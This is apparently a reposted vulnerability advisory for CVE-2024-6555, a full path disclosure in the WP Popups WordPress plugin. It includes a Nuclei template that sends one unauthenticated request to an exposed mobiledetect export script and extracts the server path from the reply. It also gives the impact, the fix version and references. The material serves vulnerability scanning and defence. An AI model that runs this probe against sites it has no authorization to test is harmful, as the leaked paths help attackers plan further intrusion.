CVE-2024-6555: WP Popups - Information Disclosure

日期: 2025-12-02 | 影响软件: WP Popups | POC: 已公开

漏洞描述

WP Popups - WordPress Popup builder plugin for WordPress contains a full path disclosure caused by using mobiledetect without access restrictions, letting unauthenticated attackers retrieve server paths, exploit requires no specific conditions.

PoC代码[已公开]

id: CVE-2024-6555

info:
  name: WP Popups - Information Disclosure
  author: theamanrawat
  severity: medium
  description: |
    WP Popups - WordPress Popup builder plugin for WordPress contains a full path disclosure caused by using mobiledetect without access restrictions, letting unauthenticated attackers retrieve server paths, exploit requires no specific conditions.
  impact: |
    Attackers can obtain server file paths, aiding in further exploitation of the website.
  remediation: |
    Update to version 2.2.0.2 or later.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-popups-lite/wp-popups-wordpress-popup-builder-2201-unauthenticated-full-path-disclosure
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6555
    - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3115849%40wp-popups-lite&new=3115849%40wp-popups-lite&sfp_email=&sfph_mail=
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/578892f2-9841-4493-8445-61b79feb4764?source=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-6555
    epss-score: 0.09
    epss-percentile: 0.9232
  metadata:
    verified: true
    max-requests: 1
    public-www: "/wp-content/plugins/wp-popups-lite/"
  tags: cve,cve2024,wordpress,wp,wp-plugin,wp-popups-lite,fpd

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/wp-popups-lite/src/vendor/mobiledetect/mobiledetectlib/export/exportToJSON.php'

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - '/[a-zA-Z0-9_\-/]+/wp-content/plugins/wp-popups-lite/src/vendor/mobiledetect/mobiledetectlib/Mobile_Detect\.json'

      - type: word
        part: content_type
        words:
          - 'text/html'

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        group: 1
        regex:
          - "Done. Check (/.+?/wp-content/plugins/wp-popups-lite/src/vendor/mobiledetect/mobiledetectlib/Mobile_Detect.json) file."
# digest: 4a0a0047304502210080b49afbf76156a564e9caf99ea4a8be9788c09edd53fe45b36d2e46307bb16d02207ac0fbd29be5aaab1c7b326d230e55ed16a559392d04a741ed60abcbcf564c57:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-6555.yaml

相关漏洞推荐